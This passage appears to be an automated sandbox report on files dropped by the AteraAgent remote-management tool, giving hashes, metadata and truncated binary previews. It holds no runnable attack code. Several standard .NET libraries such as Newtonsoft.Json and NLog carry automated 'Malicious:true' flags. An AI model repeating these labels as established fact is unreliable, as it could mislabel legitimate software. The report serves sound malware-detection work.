                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):51752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.407169811812939
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:YQMnMYnUFMSptE7C+t2RO3neZN8752vwzE8Kku6ZFMLcyXXEpYi60y:Y9MYn1seLE8JFMLcyXQ76P
                                                                                                                                                                                                                                                                                                                                  MD5:238778F7D2AE2208C8C7090FACE6C8E6
                                                                                                                                                                                                                                                                                                                                  SHA1:A02EFAB7519B1EE7A0DCF06F12F4312AEFC87FC2
                                                                                                                                                                                                                                                                                                                                  SHA-256:A4A39AF642A0B2CDDC170B9B8BA87CBC78B14D4B97629BEA3F026C6CF329D8C7
                                                                                                                                                                                                                                                                                                                                  SHA-512:11A9D0290E6C4F3F19ACFAE6F8D97849DB17BA7FF825F9CCD59AFD544101886864B49C27A35F25A20C222434F0AFCE61E69D6E1CD5CA7CD85E3279828BD547DC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............r.... ........... ....................................`.....................................O.......4...............((..........4...T............................................ ............... ..H............text...x.... ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................R.......H.......XE...q...........................................................0..........(.....o.....s........s............io........,...o.......jo....s....&.o.....O.........io ...&..i.X.O..........i(!.....i(".......(!....(#...*.........*.......0.._........($....s.......(%........i.Yo.....O......jo......s&.......io ...&(........io'.......,..o......*.........FS........((...*2.~....(....*....0...........()...,.r...ps*...z.()...,.r...ps*...z.....~....s+....s,.......o-....[o....o/...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\CommunityToolkit.WinUI.Notifications.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):145448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.203458563070589
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:s9XeDmzV2yzlhKLFU1lLVp1+2flYFnQ6H:gODmZhlNbLVp1+2W
                                                                                                                                                                                                                                                                                                                                  MD5:D64501A8B57B5ED120F55EBE1B90BFF3
                                                                                                                                                                                                                                                                                                                                  SHA1:D34253E7A5FCB1F25547730C0BF0E9C4E8B90EB0
                                                                                                                                                                                                                                                                                                                                  SHA-256:3ED26F6B9D10682BC67C283A2DB82B256B06FA1BC361F44972A5E35E7D9B0E7C
                                                                                                                                                                                                                                                                                                                                  SHA-512:645073336FE310D6A42DB227150088B45FAF6C979D9A54AB9A1F5313F9127FCE85E985211FFF9A946834EC076294A671635588C632B70D63115CE499449DC83E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nI..........." ..0.............v$... ...@....... ..............................oT....`.................................#$..O....@..|...............((...`......,#..T............................................ ............... ..H............text...|.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................W$......H.............................."......................................V!.b.....s&........*..{....*"..}....*..0..Z........(....o'...-.r...ps(...zs......(....o)....+..o*.....o.....o0...o+....o....-....,..o......*........*.$N......J.s,...}.....(-...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*6.|.....(D...*..{....*"..}....*..{....*"..}....*V.(....-.r...p*.(....*..(E...%.(....o"...%.(....o$...%.(....o ...%.o....*..(-...*..{....*"..}....*..{ ...*"..} ...*..{!...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Interop.WUApiLib.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):96296
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.633204431697952
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:k2kKfq2RQuKDMOoytxL2L4zP+YuqL2zL7SAaDx4lbOw6OhkW76fJJAZF:9QmyxL2L4D+YZL2X7SAaqywjhkWeJAZF
                                                                                                                                                                                                                                                                                                                                  MD5:B713D773EDA4CA777A9B8BDAC07D7701
                                                                                                                                                                                                                                                                                                                                  SHA1:7695C5EFB0C6BE6AB6A0E15668D73919B043B3AF
                                                                                                                                                                                                                                                                                                                                  SHA-256:BC25A66BC435FEBD67800E21C9FB491F587D72A5B4E30E76ABA2549D38463FA9
                                                                                                                                                                                                                                                                                                                                  SHA-512:C71C1AC1F8C3EA5E2F3DCC64BB5FFB58FB813CD379DC6E78F23FBDC263C12D0B8213357D06880E3C78A8AB9BF47740B15E3D1004FE9BBD75054D8FB89DB44E4A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....W...........!..... ... .......7... ...@....@.. ....................................@.................................47..W....@..p............P..((...`....................................................... ............... ..H............text........ ... .................. ..`.rsrc...p....@.......0..............@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):386600
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.136023666712228
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:+sETsbZnV4Nsaw8MkaybNq0qJh1rDHq4so8maLvdGCBg/8Q/ZmvEyc:+sbZnMfwWFKFrrWa8BvEyc
                                                                                                                                                                                                                                                                                                                                  MD5:3E62665090D7F85697152BC60771F336
                                                                                                                                                                                                                                                                                                                                  SHA1:FB1748721EC8D2A5CBBA735F0083996CAD2C8F04
                                                                                                                                                                                                                                                                                                                                  SHA-256:A7B6C8F8F8E6AAC658D8ECBF08CB16F7FA1570EF66E75D720B4E3C162B7DC801
                                                                                                                                                                                                                                                                                                                                  SHA-512:8F15AF521E1B8362DB6BD380A0D7DE9F94016AFCCAE27CA1218E8F35567B2CD86F93DB2ADCA0D341D5D5485D5E56717665CC6D0C1484DA5DE76DF9098A64B17A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... ....................... ............`.....................................O.......@...............((..............8............................................ ............... ..H............text...0.... ...................... ..`.rsrc...@...........................@..@.reloc..............................@..B........................H.......T...$...................x.........................................{0...*..{1...*..{2...*..{3...*..(4.....}0.....}1.....}2......}3...*....0..q........u........d.,_(5....{0....{0...o6...,G(7....{1....{1...o8...,/(9....{2....{2...o:...,.(;....{3....{3...o<...*.*.*....0..b....... ...u )UU.Z(5....{0...o=...X )UU.Z(7....{1...o>...X )UU.Z(9....{2...o?...X )UU.Z(;....{3...o@...X*...0...........r...p......%..{0......%q.........-.&.+.......oA....%..{1......%q.........-.&.+.....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.Primitives.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.837429951454658
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:mN9VWhX3WseNyb8E9VF6IYijSJIVxF5WvBgsS:GGZmEpYi605
                                                                                                                                                                                                                                                                                                                                  MD5:64A100F5FBD1BA75FEC06C54363454DE
                                                                                                                                                                                                                                                                                                                                  SHA1:1DD0705AAC84F2E337D9AD06F7415FCAD3D35A73
                                                                                                                                                                                                                                                                                                                                  SHA-256:59A828941D113EFEA0BABC547A5DD7C5990F584CEC46FBAC5400CA4F7203198F
                                                                                                                                                                                                                                                                                                                                  SHA-512:FFA50804F3BC1E40C846A423AC645A6D069AF38D93A7C20C85BD96A6E9840F7FE6F3E3856889C6024882266B6141C02C39331EF65C1946A407A0061933F943C5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............(... ...@....... ....................................@.................................T(..O....@..0...............((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l...|...#~......<...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.7...K.W...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):331816
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.168297341567773
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:9BhhiUWKJzPZNRntAXIjxs2f5Jg53XWlvidurmdIq8KmefViYkJTVBXi3VaKtNTk:9DMUWITZznu85k8Wdn8KmCjIFi3VvQ
                                                                                                                                                                                                                                                                                                                                  MD5:CC1B01C536A4444A614E31B9F9CEDA70
                                                                                                                                                                                                                                                                                                                                  SHA1:3FF92B3934EC29D69AC6CF264290056CEC6E11FA
                                                                                                                                                                                                                                                                                                                                  SHA-256:1B5D6FD27B69F121F8BF2CAAF42F57716A18396178127531558AD5B683C6C44D
                                                                                                                                                                                                                                                                                                                                  SHA-512:E7AFB3FECC728E1068E2E3D57087E8BB8F0B4E17C987104011C0E5D6E3F9DAAE94C70414E13FF0BEECCB6AF4A0A0C23421E018756E49EAC7896A3B60EFB31000
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... .......................@.......H....@.....................................O.......................((... ..........T............................................ ............... ..H............text...<.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H............9..............H.............................................{....*..{....*V.(......}......}....*...0..A........u3.......4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ..<. )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q6....6...-.&.+...6...o.....%..{.......%q7....7...-.&.+...7...o.....(....*..{....*..{....*..{....*r.(......}......}......}....*..0..Y........u8.......L.,G(.....{.....{....o....,/(.....{.....{....o....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\NLog.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):883752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.071391259136351
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:R1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQi:R1n1p9LdRN39aQZUqD
                                                                                                                                                                                                                                                                                                                                  MD5:97BDC98E91F0F3E959C0084420787627
                                                                                                                                                                                                                                                                                                                                  SHA1:D1E26C35D355B7F12770F10AA43B33291CCA45DC
                                                                                                                                                                                                                                                                                                                                  SHA-256:B8F2A4C3198D5ACBB27FBA2AD4DE17D7A00ED7FEA636E7391061AA65ED33FA8E
                                                                                                                                                                                                                                                                                                                                  SHA-512:39E021D6E7711ABA2BE2799C760D27A398FFEC5E3CDF4E3AF7BE3BF1AD0EFB1CFD5438E891D3A452D072E250CF9AF1EF64A162E66A411D8027BB336D8AC28D47
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..F..........:d... ........... ....................................`..................................c..O....................T..((.......... c..T............................................ ............... ..H............text....D... ...F.................. ..`.rsrc................H..............@..@.reloc...............R..............@..B.................d......H........%...2...........W.......b......................................"..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(b...~....,.~.....oc......+...(......od......,..(e....*........../7......"..(....*6.(.....(....*..0..........(.......of...&.*.(....og...*2(.....oc...*....0..?.......~..........(b...~....,.~.....oc...+...(.....oh...&...,..(e....*.........,4.......0..?.......~..........(b...~....,.~....oi......+...(....oj......,..(e..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960319767444213
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:CBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU2:CBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                                                                  MD5:276F4390B80A675709803A82BB233C96
                                                                                                                                                                                                                                                                                                                                  SHA1:091B491E832C2CE791C3EA9AC6300B2BE04286AC
                                                                                                                                                                                                                                                                                                                                  SHA-256:02DD902A4C7F18BB1660B0CCB0B6B108029E71819DD69437C6611EDABA534C23
                                                                                                                                                                                                                                                                                                                                  SHA-512:858444A45D94A0603F72886254BFDACB97B91A86AB41BA869FF51FAA9BD33BBF9C5E9E094945A1D40BE0AA57CF34E2A22336B216A1D3691BCC82F1A3762CDD81
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... .......g....`.....................................O.......................((.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Polly.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):285736
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.184377527387507
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:yZAWDkTmokB1QI3A5XeedC1OcQykFlE1WhOMiSdNrgClZ73HpsP+zvF:yZU0BJwuOcrl1w7HX3HWo
                                                                                                                                                                                                                                                                                                                                  MD5:8709E96843FA29CCC7E53D044023C552
                                                                                                                                                                                                                                                                                                                                  SHA1:B08DDF9C187F1B059C2AE92A4566FD9F29995A23
                                                                                                                                                                                                                                                                                                                                  SHA-256:CCC0F9C6AC1EB828C9CE8BA6DE85883F62BC77F314BDB051F941FA4C557EB9F7
                                                                                                                                                                                                                                                                                                                                  SHA-512:EC4D1DE0860DB304552F4698F1910A749D59C11478FF97C96B25F735370EA35CE65FC3AC3EEDAF180797199CA6EF0D689038A7941461BD3B63B41BBD1BE27551
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&............" ..0..*..........&H... ...`....... ..............................".....`..................................G..O....`..L............4..((...........G..T............................................ ............... ..H............text...,(... ...*.................. ..`.rsrc...L....`.......,..............@..@.reloc...............2..............@..B.................H......H....... d..t....................F......................................^.{....,.(F...z..}.....*^.{....,.(F...z..}.....*"..(K...*"..(L...*...0..,.......s.......}............s9...sv....{.....(....*.0..-.......s.......}............s9....s.....{.....(....*....0..(.......s.......}............s9.....{.....(....*.0..'.......s.......}............s9...sv.....(....*B...s......(....*......(....*.0..'.......s.......}............s9...sv.....(....*F...s.......(....*....0..X.........(:...}

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.559799059321212
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:UAQk7qYbA6fXDpLk5LHAxOEaGxBtNXNyb8E9VF6IYijSJIVxsuAA:f1LOg3BtNbEpYi60r
                                                                                                                                                                                                                                                                                                                                  MD5:2BAAFD549134B93D6AEAB6C76C7F09F7
                                                                                                                                                                                                                                                                                                                                  SHA1:D9248BEB04AFB5636FA53DCDEF7D2B4E7D31BC83
                                                                                                                                                                                                                                                                                                                                  SHA-256:E4AEADB114BACA3E90BE9A8A6E3F856F603CEC41330EC8E77F3BF83980072CC2
                                                                                                                                                                                                                                                                                                                                  SHA-512:5D6463F497CA32BF3317072AD528376D4C7E3D99330611BCE447FF93967EA39F66762AB4585C9C8A220726FBC1BC1329999AD8B2A7C402107F1D47CC64478C02
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............."...0..2...........Q... ...`....@.. ....................................`..................................Q..O....`...............<..((...........P..8............................................ ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B.................Q......H........*.. &...........................................................0..:.......~....s....(.....(.~....r...p.o....r...p.o....(....o......*.............(......(....*.s.........*.0...........(.....(....o....r...p(....}......}.....s....}......{....s....}......{....s....}......{....s....}.....s....}.....(...+.~....%-.&~..........s....%............s....(.....{....s ...}......{....s!...}......{.....{....s....}....*.0...........(....,..(....*.{.... ....rU..pr...p.o"...u(.....(#.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2029
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.997010915207503
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:3Aruz7h+1/gF27RgdSagFsg+w3jdgDSg+CagFt:wruv4Mw9y
                                                                                                                                                                                                                                                                                                                                  MD5:A1DB8C019769BA7256F40E580304C782
                                                                                                                                                                                                                                                                                                                                  SHA1:6C0D70EE9CEBFC288A88B100F59D5554F8C42A35
                                                                                                                                                                                                                                                                                                                                  SHA-256:FC68DEF71CD783C53B3D106317F879E544E3443A55AF195BDD6C663F8051A96F
                                                                                                                                                                                                                                                                                                                                  SHA-512:795C141D06E70CD0D91ACFFE74F519EDB78382588B10927D456D20AA70D10BADCF02A626B8B666B00B21CAFCD555F03029D16EFAABCF1D762D58AA8095B6527D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependent

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminderNotification.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):210984
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.348074820428543
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:esMNkrE4AOS3ncIzkq2ijc3Y28MNwH5Z54a7i:jMNkrE4AOqcIzQijL8
                                                                                                                                                                                                                                                                                                                                  MD5:FF36CEEC4BE917103DB73BC605896B9F
                                                                                                                                                                                                                                                                                                                                  SHA1:DD994E78F385971C64051CC3F5B2542D5B1789B2
                                                                                                                                                                                                                                                                                                                                  SHA-256:FD8BD1FAF055618546632F7B923B58742139125E52CD6C01AED5297A89044BFD
                                                                                                                                                                                                                                                                                                                                  SHA-512:430E17B0C68AEDDEEF1192A5814FD248B7D649261A671210197D0564981FDD3C1ADD1FF711E1CDFE5E863FBB636C69829A89F05BD8F5B52E9FC8ADD30AB5644A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z............"...0..............;... ...@....@.. .......................`............`..................................;..O....@..@...............((...@.......:..8............................................ ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......@......................@..B.................;......H.......H$...............................................................0..;.......~....s.....(.....(.~....r...p.o....r...p.o....(....o......*............(......(....*.s.........*.0..x........(......}.....(.....s....}.....s....}....(...+.~....%-.&~..........s....%............s....(.....{....s.......s....}....*.0..5.......(....--(....o......(.......(....+. ....( ....{....,.*....0..I.........i....*..{.......o!.....{.....o...+.. ..{....r!..p.o....(#...o.......*.*............'..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminderNotification.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):19433
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.9963400212242055
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:hrg4CdkumUwfGReGWeGFuGgeKCUDuTeHOTu0U5e3eTOaUmS0SXStuKhubUfSJeZY:hrPOPUDCTHffIz
                                                                                                                                                                                                                                                                                                                                  MD5:78AE9CC6C7B11BAC2B18E82FC7623CDB
                                                                                                                                                                                                                                                                                                                                  SHA1:8314E6F35448B820C7C703FC3E4DE598D2A51AEC
                                                                                                                                                                                                                                                                                                                                  SHA-256:D3841AA3440CDA26776DDE128157294E69A70B21344D5877D640C457353C2DCB
                                                                                                                                                                                                                                                                                                                                  SHA-512:CE6A750E75090487C47095B80D47F5AD0C3D3DE4D6EC58A01E14CC694600FEF951AE371DD2A1B82C756ADD66825611B13240DDD3AAE6339ED85DBD3392DED7E5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
